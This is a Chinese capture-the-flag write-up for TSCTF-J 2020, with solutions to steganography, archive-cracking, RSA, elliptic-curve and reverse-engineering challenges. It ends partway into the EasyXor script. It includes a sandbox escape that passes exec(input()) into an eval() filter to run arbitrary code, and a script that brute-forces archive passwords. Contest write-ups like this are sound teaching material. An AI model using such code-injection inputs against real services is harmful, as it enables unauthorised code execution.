TSCTF-J 2020 WriteUP
人生中第一次的 CTF (也许?
# TSCTF-J 2020 Kagami WriteUP
# Misc
# 笑里藏刀
解压 xlcd.zip
姐姐喜欢把自己的生日设为密码,而且姐姐可懒了,一般都用4位密码
百度 得到密码 生日月+日四位密码
解压得到16.png
hex查看 得到base64编码的flag
flag:czBfYmVhdVRpZnVsX2dpcjEKCg==
解码提交即可
# Whoami
Jsfuck,去掉末尾括号执行一下
(function anonymous(
) {
alert("flag is TtS_C_T4F_-_Jf{e1NSc_e_?T?h?A}\n欸?好像不太对?")
})
TtS_C_T4F_-_Jf{e1NSc_e_?T?h?A}
类似fence隔一个去掉一个然后放在最后
TSCTF-J{1S__ThA}
TSCTF-J{1S__ThAt__4__feNce???}
# 传世经典
没啥好说的了 就硬拼吧 ps一块一块拼
最后整理wp的时候有个新思路还没来得及实验:pil库检测图片边缘(计算出一个特征值 ?)然后相似的放在一起
# 隐写术知多少
爆破压缩包密码 1234
观察发现是数对x,y且都在290以内
猜想是二维码
from PIL import Image
def replylist(l):
    """Return the lines of ``<l>.txt`` as a list of strings.

    The file is read as UTF-8. Only newline characters are stripped from
    each line; any other whitespace is kept as-is.
    """
    with open(l + '.txt', 'r', encoding="utf-8") as handle:
        return [row.strip('\n') for row in handle]
# Each line of flag.txt is an "x,y" pair; every pair becomes one black pixel.
res = replylist('flag')
a = []
for x in res:
    fields = x.split(',')
    a.append([int(fields[0]), int(fields[1])])

# White 300x300 canvas; the write-up observes that all coordinates stay
# below 290, so every point fits.
img = Image.new("RGB", (300, 300), (255, 255, 255))
pixTuple = (0, 0, 0, 0)
for px, py in a:
    img.putpixel((px, py), pixTuple)
img.save("bb.png")
最后ps一下三个脚脚 扫描得到flag
TSCTF-J{D0_u_L0vE_STeGo?}
# 俄罗斯套娃
本来还想爆破密码的 结果试了俩直接是递增的
写个小py解压
这里的4dict是生成的0000开始的递增字典
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 14 19:39:37 2020
@author: Kagami
"""
import rarfile
import zipfile
import os,random,time
def replylist(l):
    """Load ``<l>.txt`` (UTF-8) and return its lines without newline characters."""
    result = []
    with open(l + '.txt', 'r', encoding="utf-8") as f:
        result.extend(entry.strip('\n') for entry in f)
    return result
# Candidate passwords, one per line, read from 4dict.txt; the write-up describes
# this file as a generated ascending list starting at 0000.
res = replylist('4dict')
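def decode_rar(pwd, orip, p):
    """Extract the RAR archive ``orip`` into directory ``p`` with password ``pwd``.

    Extraction is best-effort: a failure (wrong password, damaged or missing
    archive) is reported and swallowed so the calling loop can carry on.
    Archive members come from an untrusted file, so ``p`` should be a
    scratch directory.
    """
    try:
        # The context manager closes the archive handle even if extraction fails.
        with rarfile.RarFile(orip) as fp:
            fp.extractall(path=p, pwd=pwd)
    except Exception as err:
        # Previously a bare ``except: pass``, which also swallowed
        # KeyboardInterrupt and gave no hint why a layer was not unpacked.
        print('rar extract failed:', orip, err)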
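def decode_zip(pwd, orip, p):
    """Extract the ZIP archive ``orip`` into directory ``p`` with password ``pwd``.

    ``pwd`` is a ``str`` and is encoded to bytes for ``zipfile``. Extraction
    is best-effort: a failure (wrong password, damaged or missing archive)
    is reported and swallowed so the calling loop can carry on. Archive
    members come from an untrusted file, so ``p`` should be a scratch
    directory.
    """
    try:
        # The context manager closes the archive handle even if extraction fails.
        with zipfile.ZipFile(orip) as fp:
            fp.extractall(path=p, pwd=pwd.encode())
    except Exception as err:
        # Previously a bare ``except: pass``, which also swallowed
        # KeyboardInterrupt and gave no hint why a layer was not unpacked.
        print('zip extract failed:', orip, err)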
def file_name(file_dir):
    """Return the bare names of all files under ``file_dir``, searched recursively.

    Only the file names are returned, not their directory paths.
    """
    return [name for _root, _dirs, files in os.walk(file_dir) for name in files]
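def ex(lis):
    """Return True when ``lis`` holds no further archive names, else False.

    The previous condition ``'zip' or 'rar' or ... in x`` was always truthy
    (a non-empty string literal), so the function returned False for every
    non-empty list and the caller's loop could never finish normally.
    A name counts as an archive when it ends in ``zip`` or ``rar``, the
    same case-sensitive test the unpacking loop uses.
    """
    return not any(name.endswith(('zip', 'rar')) for name in lis)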
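# Peel the nested archives one layer at a time: layer N is unpacked into ./N
# with password res[N], then the freshly created directory becomes the input.
pd = False
tempath = os.getcwd() + '/ori/'
it = 0
while pd == False:
    archives = [x for x in file_name(tempath) if x.endswith('zip') or x.endswith('rar')]
    if not archives or it >= len(res):
        # Nothing left to unpack, or the password list is used up: stop here
        # rather than looping forever or failing with an IndexError.
        break
    ntmpath = os.getcwd() + '/' + str(it)
    # exist_ok lets a re-run over a partly unpacked tree continue.
    os.makedirs(ntmpath, exist_ok=True)
    for a in archives:
        if it >= len(res):
            break
        if a.endswith('zip'):
            decode_zip(res[it], tempath + '/' + a, ntmpath)
        else:
            decode_rar(res[it], tempath + '/' + a, ntmpath)
        it = it + 1
    tempath = ntmpath
    pd = ex(file_name(ntmpath))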
# hide&seek
TweakPNg打开 发现高度被修改
使用py检测出原始宽高
639 597 hex: 0x27f 0x255
用winhex修改得到正确图片 得到前半段flag
用binwalk发现里面还有东西 解出来得到文件夹 在一个文件中发现下列加密文本
a= '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" 
xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14"><w:body><w:p w14:paraId="5C9B99D5" w14:textId="17CC76B8" w:rsidR="00BA3D22" w:rsidRDefault="00F72ADB" w:rsidP="00BA3D22"><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>佛曰:</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怯帝怯夢奢曳般怯喝呐不</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>呐能罰倒</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>梵羯</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>缽蒙呐</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怛哆娑</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>多彌罰他</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>梵</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>呼呐</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>夢</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>至罰舍</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>皤</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>薩</w:t></w:r><w:proofErr w:type="gramStart"/><w:r 
w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>娑皤</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>。智諳</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>羯呐心夷怯醯</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>除礙怯</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>參</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怯殿</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>哆伽特吉者</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>密楞</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>參</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>死倒</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怛涅奢</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>多</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>哆</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>謹</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>皤</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>神</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts 
w:hint="eastAsia"/></w:rPr><w:t>梵</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>穆</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>曳藐</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怯真缽朋</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>冥醯梵</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>蘇俱恐般</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>數</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>遮喝</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>怖呐多</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>能罰特</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>冥</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>三怯</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>曳</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>利輸上</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>醯</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>俱隸呐諸能缽夷</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>哆</w:t></w:r><w:proofErr 
w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>等</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>數</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>盧</w:t></w:r><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>瑟皤夷竟</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="00F72ADB"><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr><w:t>上罰殿諳三</w:t></w:r></w:p><w:p w14:paraId="19F31DCE" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRDefault="00F72ADB" w:rsidP="00BA3D22"><w:pPr><w:rPr><w:rFonts w:hint="eastAsia"/></w:rPr></w:pPr></w:p><w:p w14:paraId="18A78C48" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>自由友善法治公正</w:t></w:r></w:p><w:p w14:paraId="7238611B" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>平等平等</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>诚信平等</w:t></w:r></w:p><w:p w14:paraId="23105F0C" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>和谐民主公正诚信</w:t></w:r></w:p><w:p w14:paraId="19D1E92B" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r 
w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>自由平等诚信平等</w:t></w:r></w:p><w:p w14:paraId="61BC0BB2" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>法治自由公正爱国</w:t></w:r></w:p><w:p w14:paraId="1F485354" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:proofErr w:type="gramStart"/><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>和谐和谐</w:t></w:r><w:proofErr w:type="gramEnd"/><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>平等友善</w:t></w:r></w:p><w:p w14:paraId="15C457E6" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>敬业公正自由和谐</w:t></w:r></w:p><w:p w14:paraId="6F8E773B" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>文明法治文明公正</w:t></w:r></w:p><w:p w14:paraId="3CE01288" w14:textId="77777777" w:rsidR="00F72ADB" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>友善平等法治友善</w:t></w:r></w:p><w:p w14:paraId="60182116" w14:textId="47810D17" w:rsidR="00BA3D22" w:rsidRPr="001631A4" w:rsidRDefault="00F72ADB" w:rsidP="00F72ADB"><w:pPr><w:rPr><w:vanish/></w:rPr></w:pPr><w:r w:rsidRPr="001631A4"><w:rPr><w:rFonts w:hint="eastAsia"/><w:vanish/></w:rPr><w:t>法治</w:t></w:r></w:p><w:sectPr 
w:rsidR="00BA3D22" w:rsidRPr="001631A4"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/><w:cols w:space="425"/><w:docGrid w:type="lines" w:linePitch="312"/></w:sectPr></w:body></w:document>'''
import re
def find(data, src):
    """Return every match of the regular expression ``src`` in ``data``.

    With one capture group in ``src`` the result is the list of captured
    strings, as produced by ``re.findall``.
    """
    return re.findall(src, data)
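# Collect the text of every <w:t> run in the document XML. This also returns
# the runs whose properties carry <w:vanish/> (hidden text in Word), which is
# where the second ciphertext sits.
# Raw string without the needless backslashes: '\<' and '\:' in a normal
# string literal are invalid escape sequences and trigger a warning.
c = find(a, r'<w:t>(.*?)</w:t>')
# Bare expression: the joined text is only displayed in an interactive session.
''.join(c)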
Out[11]: '佛曰:怯帝怯夢奢曳般怯喝呐不呐能罰倒梵羯缽蒙呐怛哆娑多彌罰他梵呼呐夢至罰舍皤薩娑皤。智諳羯呐心夷怯醯除礙怯參怯殿哆伽特吉者密楞參死倒怛涅奢多哆謹皤神梵穆曳藐怯真缽朋冥醯梵蘇俱恐般數遮喝怖呐多能罰特冥三怯曳利輸上醯俱隸呐諸能缽夷哆等數盧瑟皤夷竟上罰殿諳三自由友善法治公正平等平等诚信平等和谐民主公正诚信自由平等诚信平等法治自由公正爱国和谐和谐平等友善敬业公正自由和谐文明法治文明公正友善平等法治友善法治'
发现两段加密 与佛论禅和社会主义核心价值观加密
解密 I said there is nothing…… But _U_F1nd_ Me_1n_th3_d2rk}
# 那你能帮帮我吗
这题...是个python的trick 结果我以前从来没用过 最后弄出来个非预期解
exec(input())
print(flag)
用了以上代码构建了一个任意长度的执行
由于观察到源代码
try:
val = 0
inp = input("Input value: ")
count_digits = len(set(inp))
if count_digits <= 10:
val = eval(inp)
有个eval 并且限制了输入中不同字符的种类不超过10个(len(set(inp)) <= 10,限制的不是输入长度)
于是就构造了一个exec(input())
于是val就变成了 val = eval(exec(input()))
这样就可以执行任意长度的代码了
下列是两种正确(?)解法
#解法一
print(vars())
#解法二
help(flag)
# Crypto
# LordRiot's student
n=2381011181934210877525887658573010292764252520710975398332345697578708886833447259427
e = 65537
c=2257217580308235254675172512515127526716817457982166903087845357172847507580627548946
利用yafu分解
P8 = 30290341
P77=78606285149916631097876635280303060726990578307156575039295387845871688497447
得到p,q
计算 得到flag
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 10 21:17:09 2020
@author: Kagami
"""
import libnum
from Crypto.Util.number import long_to_bytes
# RSA parameters from the challenge. The 85-digit modulus n has an 8-digit
# prime factor, which is why the write-up could factor it directly with yafu.
c = 2257217580308235254675172512515127526716817457982166903087845357172847507580627548946
n = 2381011181934210877525887658573010292764252520710975398332345697578708886833447259427
e = 65537
# The two prime factors of n.
q = 30290341
p = 78606285149916631097876635280303060726990578307156575039295387845871688497447
# Private exponent: inverse of e modulo (p - 1) * (q - 1).
phi = (p - 1) * (q - 1)
d = libnum.invmod(e, phi)
m = pow(c, d, n)
string = long_to_bytes(m)  # m is the plaintext
print(string)
# 三十六天罡+七十二地煞
很简单的一道题,看到题目名称三十六天罡+七十二地煞 先把人名转换成对应的序号,然后再加上72得到ascii码,最后转换一下就行了
这题必须吐槽一下 出题人把flag在平台里搞错了多加了个空格 导致我怎么看都觉得我的没问题结果就是不对 半夜解出来翻来覆去看了半个多小时这玩意到底哪里有问题看到怀疑人生
songjiang 宋江 1
10jin 史进 23
gongsunsheng 4
qinming 7
5song 14
ruanxiao5 29
ruanxiao2 27
yangxiong 32
10xiu 33
linchong 6
leiheng 25
1 23 4 7 14 29 27 32 33 6 25
73 95 76 79 86 101 99 104 105 78 97
I_LOVechiNa
# 二重唱
电报码加摩斯电码吗
转换一下
1571 4249 2900 0955 2575 4848 0502 1378 1 .--. -.--. .- --..-- -... -.--.- 0639 2422 3634
已知椭圆曲线加密一P(A,B)参数为
.--. -...- 739373920927
P=739373920927
.- -...- -3
A=-3
-... -...- 397352705311
B=397352705311
001 -.--. 391857459775 --..-- 520195089328 -.--.-
001 (391857459775,520195089328)
Gx = 391857459775 Gy = 520195089328
私钥为
-.- -...- 319880
K = 319880
3061 0361 7011 010 -.--. -..- --..-- -.-- -.--.-
求公钥(X,Y)
flag是TSCTF-J{x+y}
解一下
514179734510
478982494818
TSCTF-J{993162229328}
下方是椭圆曲线加密解密的py
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 16 21:59:47 2020
@author: Kagami
"""
import collections
import random
# Record holding the curve parameters used by the point functions below:
# the curve equation checked in is_on_curve() is y^2 = x^3 + a*x + b (mod p).
EllipticCurve = collections.namedtuple('EllipticCurve', 'name p a b g n h')
# NOTE(review): the name below says 'secp256k1', but every parameter is read
# from stdin, so the curve actually used is whatever the user types in.
curve = EllipticCurve(
'secp256k1',
# Field characteristic.
p=int(input('p=')),
# Curve coefficients.
a=int(input('a=')),
b=int(input('b=')),
# Base point.
g=(int(input('Gx=')),
int(input('Gy='))),
# Subgroup order.
# NOTE(review): the prompt is 'k=' and make_keypair() uses this field as the
# private scalar, so in this script ``n`` carries the private key, not the
# subgroup order.
n=int(input('k=')),
# Subgroup cofactor.
h=1,
)
# Modular arithmetic ##########################################################
def inverse_mod(k, p):
    """Return the multiplicative inverse of k modulo p.

    The result is the integer x in [0, p) with (x * k) % p == 1.
    k must be non-zero and p must be prime; k == 0 raises
    ZeroDivisionError. The final sanity checks are ``assert`` statements,
    so they disappear when Python runs with -O.
    """
    if k == 0:
        raise ZeroDivisionError('division by zero')
    if k < 0:
        # k ** -1 = p - (-k) ** -1 (mod p)
        return p - inverse_mod(-k, p)

    # Extended Euclid, tracking only the coefficient that belongs to k.
    prev_r, cur_r = k, p
    prev_s, cur_s = 1, 0
    while cur_r != 0:
        q, rem = divmod(prev_r, cur_r)
        prev_r, cur_r = cur_r, rem
        prev_s, cur_s = cur_s, prev_s - q * cur_s

    assert prev_r == 1
    assert (k * prev_s) % p == 1
    return prev_s % p
# Functions that work on curve points #########################################
def is_on_curve(point):
    """Return True if ``point`` satisfies the equation of the global ``curve``.

    ``None`` stands for the point at infinity and always counts as on the curve.
    """
    if point is None:
        return True
    x, y = point
    lhs = y * y
    rhs = x * x * x + curve.a * x + curve.b
    return (lhs - rhs) % curve.p == 0
def point_neg(point):
    """Return the negation of ``point``; the point at infinity negates to itself.

    Input and output are validated with ``assert``, so the checks vanish
    under ``python -O``.
    """
    assert is_on_curve(point)
    if point is None:
        # -0 = 0
        return None
    x, y = point
    negated = (x, (-y) % curve.p)
    assert is_on_curve(negated)
    return negated
def point_add(point1, point2):
    """Return point1 + point2 under the group law of the global ``curve``.

    ``None`` is the point at infinity (the identity). Both inputs and the
    result are validated with ``assert``, so the checks vanish under
    ``python -O``.
    """
    assert is_on_curve(point1)
    assert is_on_curve(point2)

    # The identity element leaves the other operand unchanged.
    if point1 is None:
        return point2
    if point2 is None:
        return point1

    x1, y1 = point1
    x2, y2 = point2

    if x1 == x2:
        if y1 != y2:
            # point1 + (-point1) = 0
            return None
        # Doubling: slope of the tangent at point1.
        slope = (3 * x1 * x1 + curve.a) * inverse_mod(2 * y1, curve.p)
    else:
        # Distinct points: slope of the chord through them.
        slope = (y1 - y2) * inverse_mod(x1 - x2, curve.p)

    x3 = slope * slope - x1 - x2
    y3 = y1 + slope * (x3 - x1)
    total = (x3 % curve.p, -y3 % curve.p)

    assert is_on_curve(total)
    return total
def scalar_mult(k, point):
    """Return k * point using double-and-add.

    A negative k is handled as (-k) * (-point). The loop branches on the
    individual bits of k.
    """
    assert is_on_curve(point)

    if k < 0:
        # k * point = -k * (-point)
        return scalar_mult(-k, point_neg(point))

    acc = None
    power = point
    while k:
        k, low_bit = divmod(k, 2)
        if low_bit:
            # This bit is set: add the current power of two times point.
            acc = point_add(acc, power)
        # Move on to the next power of two.
        power = point_add(power, power)

    assert is_on_curve(acc)
    return acc
# Keypair generation and ECDHE ################################################
def make_keypair():
    """Return ``(private_key, public_key)`` for the scalar stored in ``curve.n``.

    Nothing is random here: the private key is the value entered at the
    'k=' prompt, and the public key is that scalar times the base point.
    """
    secret = curve.n
    return secret, scalar_mult(secret, curve.g)
# Derive the key pair and display it. Note that the private scalar is
# written to stdout as well.
private_key, public_key = make_keypair()
print("private key:", hex(private_key))
pub_x, pub_y = public_key
print("public key: (0x{:x}, 0x{:x})".format(pub_x, pub_y))
# Re
# EasyXor
逆向签到题(bushi 很简单的一道题 直接ida打开看看就行
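# Encoded bytes recovered from the binary (29 values). Written as a literal:
# the original ``n = list = [...]`` also rebound the builtin name ``list``.
n = [
    62, 58, 41, 57, 44, 84, 54, 28, 58, 99,
    34, 60, 98, 9, 20, 56, 78, 31, 32, 52,
    74, 13, 27, 48, 37, 36, 29, 97, 101,
]
# Key string the check XORs against, one character per position.
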